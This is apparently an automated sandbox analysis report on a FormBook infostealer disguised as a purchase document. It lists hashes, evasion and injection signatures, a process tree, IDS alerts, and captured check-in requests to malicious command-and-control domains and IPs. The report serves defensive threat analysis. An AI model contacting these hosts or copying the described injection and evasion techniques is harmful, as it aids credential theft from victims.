
Windows Analysis Report
ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe

Overview

General Information

Sample name: ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe
Analysis ID: 1572660
MD5: 464587c795efba3d6a77d78ab9f3de32
SHA1: f2ce67c18f57c7919d951b640c30298bab731141
SHA256: 60f63f5446e6a149513c50ac17e7165bb6c52006eac6acd825a142d55a2ae14f

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sigma detected: Xwizard DLL Sideloading
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files

Classification

  • System is w10x64native
  • ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe (PID: 6560 cmdline: "C:\Users\user\Desktop\ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe" MD5: 464587C795EFBA3D6A77D78AB9F3DE32)
    • svchost.exe (PID: 5412 cmdline: "C:\Users\user\Desktop\ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe" MD5: B7C999040D80E5BF87886D70D992C51E)
      • EIyKLgVzlk.exe (PID: 7544 cmdline: "C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • xwizard.exe (PID: 1844 cmdline: "C:\Windows\SysWOW64\xwizard.exe" MD5: 8581F29C5F84B72C053DBCC5372C5DB6)
          • EIyKLgVzlk.exe (PID: 7508 cmdline: "C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 32 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: FA9F4FC5D7ECAB5A20BF7A9D1251C851)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000004.00000002.65194002621.0000000003420000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000002.00000002.64235487753.0000000003390000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000005.00000002.65193414239.00000000014F0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000002.00000002.64236564536.0000000006150000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000004.00000002.65194255223.0000000004C90000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

System Summary

Source: Process started | Author: Christian Burkard (Nextron Systems) | Data: Command: "C:\Windows\SysWOW64\xwizard.exe", CommandLine: "C:\Windows\SysWOW64\xwizard.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\xwizard.exe, NewProcessName: C:\Windows\SysWOW64\xwizard.exe, OriginalFileName: C:\Windows\SysWOW64\xwizard.exe, ParentCommandLine: "C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exe" , ParentImage: C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exe, ParentProcessId: 7544, ParentProcessName: EIyKLgVzlk.exe, ProcessCommandLine: "C:\Windows\SysWOW64\xwizard.exe", ProcessId: 1844, ProcessName: xwizard.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Users\user\Desktop\ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe", CommandLine: "C:\Users\user\Desktop\ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe", CommandLine|base64offset|contains: 8, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe", ParentImage: C:\Users\user\Desktop\ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe, ParentProcessId: 6560, ParentProcessName: ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe, ProcessCommandLine: "C:\Users\user\Desktop\ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe", ProcessId: 5412, ProcessName: svchost.exe
Source: Process started | Author: vburov | Data: Command: "C:\Users\user\Desktop\ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe", CommandLine: "C:\Users\user\Desktop\ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe", CommandLine|base64offset|contains: 8, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe", ParentImage: C:\Users\user\Desktop\ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe, ParentProcessId: 6560, ParentProcessName: ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe, ProcessCommandLine: "C:\Users\user\Desktop\ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe", ProcessId: 5412, ProcessName: svchost.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-10T18:48:27.548312+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.11.20 | 49755 | 162.251.95.62 | 80 | TCP
2024-12-10T18:48:51.684040+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.11.20 | 49759 | 84.32.84.32 | 80 | TCP
2024-12-10T18:49:06.152353+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.11.20 | 49763 | 104.21.64.208 | 80 | TCP
2024-12-10T18:49:19.805288+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.11.20 | 49767 | 199.59.243.227 | 80 | TCP
2024-12-10T18:49:33.220855+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.11.20 | 49771 | 199.59.243.227 | 80 | TCP
2024-12-10T18:49:47.014958+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.11.20 | 49775 | 209.74.79.41 | 80 | TCP
2024-12-10T18:50:01.276604+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.11.20 | 49779 | 172.67.128.109 | 80 | TCP
2024-12-10T18:50:16.356830+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.11.20 | 49783 | 47.83.1.90 | 80 | TCP
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-10T18:47:36.565238+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.11.20 | 49758 | 84.32.84.32 | 80 | TCP
2024-12-10T18:47:36.565238+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.11.20 | 49756 | 84.32.84.32 | 80 | TCP
2024-12-10T18:47:36.565238+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.11.20 | 49757 | 84.32.84.32 | 80 | TCP
2024-12-10T18:48:57.993871+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.11.20 | 49760 | 104.21.64.208 | 80 | TCP
2024-12-10T18:49:00.644650+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.11.20 | 49761 | 104.21.64.208 | 80 | TCP
2024-12-10T18:49:03.537440+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.11.20 | 49762 | 104.21.64.208 | 80 | TCP
2024-12-10T18:49:11.680216+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.11.20 | 49764 | 199.59.243.227 | 80 | TCP
2024-12-10T18:49:14.391627+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.11.20 | 49765 | 199.59.243.227 | 80 | TCP
2024-12-10T18:49:17.087577+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.11.20 | 49766 | 199.59.243.227 | 80 | TCP
2024-12-10T18:49:25.252644+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.11.20 | 49768 | 199.59.243.227 | 80 | TCP
2024-12-10T18:49:27.908725+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.11.20 | 49769 | 199.59.243.227 | 80 | TCP
2024-12-10T18:49:30.565792+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.11.20 | 49770 | 199.59.243.227 | 80 | TCP
2024-12-10T18:49:38.853215+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.11.20 | 49772 | 209.74.79.41 | 80 | TCP
2024-12-10T18:49:41.539486+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.11.20 | 49773 | 209.74.79.41 | 80 | TCP
2024-12-10T18:49:44.288907+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.11.20 | 49774 | 209.74.79.41 | 80 | TCP
2024-12-10T18:49:53.406218+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.11.20 | 49776 | 172.67.128.109 | 80 | TCP
2024-12-10T18:49:56.072312+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.11.20 | 49777 | 172.67.128.109 | 80 | TCP
2024-12-10T18:49:58.877370+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.11.20 | 49778 | 172.67.128.109 | 80 | TCP
2024-12-10T18:50:08.290020+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.11.20 | 49780 | 47.83.1.90 | 80 | TCP
2024-12-10T18:50:10.678387+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.11.20 | 49781 | 47.83.1.90 | 80 | TCP
2024-12-10T18:50:13.527999+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.11.20 | 49782 | 47.83.1.90 | 80 | TCP


AV Detection

Source: http://www.telepzow.fit/oizn/ | Avira URL Cloud: Label: phishing
Source: http://www.telepzow.fit/oizn/?LLp=-2JPqdjXxxH4&QT=uQjrwkUUEo9A4dlQfcggdTsxH9QBobj0afRbN7eAn79tTht6fIX+AVk9Vz6pdINH1MMl3rmaK9mEFEBfLFOrTBMBvACsMmeMqJHqbDbv0Ca02GpIn7UGPXA= | Avira URL Cloud: Label: phishing
Source: ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe | ReversingLabs: Detection: 27%
Source: Yara match | File source: 00000004.00000002.65194002621.0000000003420000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.64235487753.0000000003390000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.65193414239.00000000014F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.64236564536.0000000006150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.65194255223.0000000004C90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.65194174244.0000000005260000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.64234129622.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.65192118300.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe | Joe Sandbox ML: detected
Source: ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: EIyKLgVzlk.exe, 00000003.00000002.65192008768.000000000028E000.00000002.00000001.01000000.00000004.sdmp, EIyKLgVzlk.exe, 00000005.00000002.65192012128.000000000028E000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe, 00000000.00000003.63941655319.0000000003F60000.00000004.00001000.00020000.00000000.sdmp, ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe, 00000000.00000003.63945048375.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.64235694219.000000000372D000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.64142076906.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.64144938624.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.64235694219.0000000003600000.00000040.00001000.00020000.00000000.sdmp, xwizard.exe, 00000004.00000003.64238602589.0000000004DDD000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000004.00000002.65194630991.0000000004F90000.00000040.00001000.00020000.00000000.sdmp, xwizard.exe, 00000004.00000002.65194630991.00000000050BD000.00000040.00001000.00020000.00000000.sdmp, xwizard.exe, 00000004.00000003.64235438172.0000000004C27000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe, 00000000.00000003.63941655319.0000000003F60000.00000004.00001000.00020000.00000000.sdmp, ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe, 00000000.00000003.63945048375.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.64235694219.000000000372D000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.64142076906.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.64144938624.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.64235694219.0000000003600000.00000040.00001000.00020000.00000000.sdmp, xwizard.exe, 00000004.00000003.64238602589.0000000004DDD000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000004.00000002.65194630991.0000000004F90000.00000040.00001000.00020000.00000000.sdmp, xwizard.exe, 00000004.00000002.65194630991.00000000050BD000.00000040.00001000.00020000.00000000.sdmp, xwizard.exe, 00000004.00000003.64235438172.0000000004C27000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: xwizard.pdb source: svchost.exe, 00000002.00000003.64203202096.000000000301B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.64203426451.0000000003027000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.64203370841.000000000301A000.00000004.00000020.00020000.00000000.sdmp, EIyKLgVzlk.exe, 00000003.00000002.65193076709.0000000000D67000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: xwizard.exe, 00000004.00000002.65195625577.00000000055BC000.00000004.10000000.00040000.00000000.sdmp, xwizard.exe, 00000004.00000002.65192360939.0000000002FC6000.00000004.00000020.00020000.00000000.sdmp, EIyKLgVzlk.exe, 00000005.00000000.64301811378.00000000034BC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000006.00000002.64526000051.00000000274BC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: xwizard.exe, 00000004.00000002.65195625577.00000000055BC000.00000004.10000000.00040000.00000000.sdmp, xwizard.exe, 00000004.00000002.65192360939.0000000002FC6000.00000004.00000020.00020000.00000000.sdmp, EIyKLgVzlk.exe, 00000005.00000000.64301811378.00000000034BC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000006.00000002.64526000051.00000000274BC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: xwizard.pdbGCTL source: svchost.exe, 00000002.00000003.64203202096.000000000301B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.64203426451.0000000003027000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.64203370841.000000000301A000.00000004.00000020.00020000.00000000.sdmp, EIyKLgVzlk.exe, 00000003.00000002.65193076709.0000000000D67000.00000004.00000020.00020000.00000000.sdmp

Networking

Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49770 -> 199.59.243.227:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49762 -> 104.21.64.208:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49765 -> 199.59.243.227:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49768 -> 199.59.243.227:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49760 -> 104.21.64.208:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49772 -> 209.74.79.41:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49764 -> 199.59.243.227:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49774 -> 209.74.79.41:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49769 -> 199.59.243.227:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49761 -> 104.21.64.208:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49759 -> 84.32.84.32:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49755 -> 162.251.95.62:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49773 -> 209.74.79.41:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49775 -> 209.74.79.41:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49776 -> 172.67.128.109:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49777 -> 172.67.128.109:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49771 -> 199.59.243.227:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49782 -> 47.83.1.90:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49763 -> 104.21.64.208:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49783 -> 47.83.1.90:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49779 -> 172.67.128.109:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49781 -> 47.83.1.90:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49766 -> 199.59.243.227:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49778 -> 172.67.128.109:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49767 -> 199.59.243.227:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49780 -> 47.83.1.90:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49758 -> 84.32.84.32:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49756 -> 84.32.84.32:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49757 -> 84.32.84.32:80
Source: Joe Sandbox View | IP Address: 104.21.64.208
Source: Joe Sandbox View | IP Address: 199.59.243.227
Source: Joe Sandbox View | ASN Name: MULTIBAND-NEWHOPEUS
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (8 events)
Source: global traffic | HTTP traffic detected: GET /jv64/?QT=0rgj4Y9sgnjazUN8mpbMdGhoFe+HkDbNZTVEPCZk5UU8x8xERo30l5aFjW3xVEpqAaMpb+WWzoUct0TX0HY7y+Y5ieOqpPsPHRlC6dNFB2EQ+kIpm+R3QUE=&LLp=-2JPqdjXxxH4 HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 | Accept-Language: en-US,en;q=0.9 | Connection: close | Host: www.y6h6kn.top | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:27.0) Gecko/20100101 Firefox/27.0
Source: global traffic | HTTP traffic detected: GET /z4qr/?QT=1ZZgvIaiKHhduep+YaBDSgnAwH9SiWnEbyT18lbVckKL7Qn23DKNX9UGqbKheWGJWb8pgnQ+8NB/9Zi1y/4jtTWbac3F9TEassXJax+dUsBKSmbq0EscsQY=&LLp=-2JPqdjXxxH4 HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 | Accept-Language: en-US,en;q=0.9 | Connection: close | Host: www.thesnusgang.fun | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:27.0) Gecko/20100101 Firefox/27.0
Source: global traffic | HTTP traffic detected: GET /oizn/?LLp=-2JPqdjXxxH4&QT=uQjrwkUUEo9A4dlQfcggdTsxH9QBobj0afRbN7eAn79tTht6fIX+AVk9Vz6pdINH1MMl3rmaK9mEFEBfLFOrTBMBvACsMmeMqJHqbDbv0Ca02GpIn7UGPXA= HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 | Accept-Language: en-US,en;q=0.9 | Connection: close | Host: www.telepzow.fit | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:27.0) Gecko/20100101 Firefox/27.0
Source: global traffic | HTTP traffic detected: GET /yeky/?QT=7P22LBHaa1jf6nBJoZKhVMfAW6E6enltUQ790N9gWu5M59Q4JmwGsTkf7hc1wA5HSyz6dzInvvSoc7txVpadCya5VvUUehVECqXYJH1JxrXGdxyqb1WHUVg=&LLp=-2JPqdjXxxH4 HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 | Accept-Language: en-US,en;q=0.9 | Connection: close | Host: www.dnft.immo | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:27.0) Gecko/20100101 Firefox/27.0
Source: global traffic | HTTP traffic detected: GET /0sq9/?LLp=-2JPqdjXxxH4&QT=wDssjmzaov4c9lpHi4/A+j8N6f+vZebPXluydM4tZUUyV1Bm9QX9sM5KRNX6VfgW0wIXfg38PryhAP572OSdxGSDI/O/AvGAu226L0N94rOkpbvikda6PNY= HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 | Accept-Language: en-US,en;q=0.9 | Connection: close | Host: www.deadshoy.tech | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:27.0) Gecko/20100101 Firefox/27.0
Source: global traffic | HTTP traffic detected: GET /qp01/?QT=ZPOD+BqQao/QyIxulVjbDCVFLb7RjhwyuULyKVNAiV+MeP7iuxHdlS3JdohyzquBitQvx+Sc1DnyV4OJvwDeoSt18py19YLRfjflEWoNZD6QwIJxPVF50MQ=&LLp=-2JPqdjXxxH4 HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 | Accept-Language: en-US,en;q=0.9 | Connection: close | Host: www.freshteps.life | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:27.0) Gecko/20100101 Firefox/27.0
            Source: xwizard.exe, 00000004.00000002.65196596495.0000000008013000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: "},{"applied_policy":"OnlyExposeWidevine","domain":"vhx.tv"},{"applied_policy":"OnlyExposePlayReady","domain":"hulu.com"},{"applied_policy":"OnlyExposeWidevine","domain":"app.quickhelp.com"},{"applied_policy":"OnlyExposeWidevine","domain":"DishAnywhere.com"}],"policies":[{"name":"OnlyExposePlayReady","type":"Playready"},{"name":"OnlyExposeWidevine","type":"Widevine"}],"version":1},"codec_override":{"applications":[{"applied_policy":"HideMfHevcCodec","domain":"tv.apple.com"},{"applied_policy":"HideMfHevcCodec","domain":"nintendo.com"}],"policies":[{"name":"HideMfHevcCodec","type":"MfHevcCodec"}],"version":1},"content_filter_on_off_switch":{"applications":[{"applied_policy":"ContentFilter","domain":"microsoft.com"}],"policies":[{"name":"ContentFilter"}],"version":1},"ecp_override":{"applications":[{"applied_policy":"PlainTextURLsOnly","domain":"hangouts.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"chat.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"slack.com"},{"applied_policy":"PlainTextURLsOnly","domain":"facebook.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wechat.com"},{"applied_policy":"PlainTextURLsOnly","domain":"weixin.com"},{"applied_policy":"PlainTextURLsOnly","domain":"qq.com"},{"applied_policy":"PlainTextURLsOnly","domain":"webex.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wordpress.com"},{"applied_policy":"PlainTextURLsOnly","domain":"twitter.com"},{"applied_policy":"PlainTextURLsOnly","domain":"discord.com"}],"policies":[{"name":"PlainTextURLsOnly","type":"ECPOnlyPlaintextURLs"}],"version":1},"idl_override":{"applications":[{"applied_policy":"ExposePrefixedEME","domain":"netflix.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.jp"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.uk"},{"applied_policy":"ExposePrefixedEM
E","domain":"music.amazon.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.de"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.es"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.fr"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.in"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.it"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.ca"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com.br"},{"applied_policy":"ExposePrefixedEME","domain":"sling.com"},{"applied_policy":"ExposePrefixedEME","domain":"openidconnectweb.azurewebsites.net"}],"policies":[{"name":"ExposePrefixedEME","type":"PrefixedEme"}],"version":1},"media_foundation_override":{"applications":[{"applied_policy":"OptIn","domain":"youtube.com","path_exclude":["/shorts","/kids"],"subdomain_exclude":["tv.youtube.com","studio.youtube.com","vr.youtube.com"]}],"policies":[{"name":"OptIn","type":"MediaFoundationOptIn"},{"name":"OptOut","type":"MediaFoundationOptOut"}],"version":1},"web_notification_override":{"applications":[{"applied_policy":"prompt","domain":"www.reddit.com"},{"app
Source: global traffic | DNS traffic detected: DNS query: www.y6h6kn.top
Source: global traffic | DNS traffic detected: DNS query: www.thesnusgang.fun
Source: global traffic | DNS traffic detected: DNS query: www.telepzow.fit
Source: global traffic | DNS traffic detected: DNS query: www.dnft.immo
Source: global traffic | DNS traffic detected: DNS query: www.deadshoy.tech
Source: global traffic | DNS traffic detected: DNS query: www.freshteps.life
Source: global traffic | DNS traffic detected: DNS query: www.cifasnc.info
Source: global traffic | DNS traffic detected: DNS query: www.cruycq.info
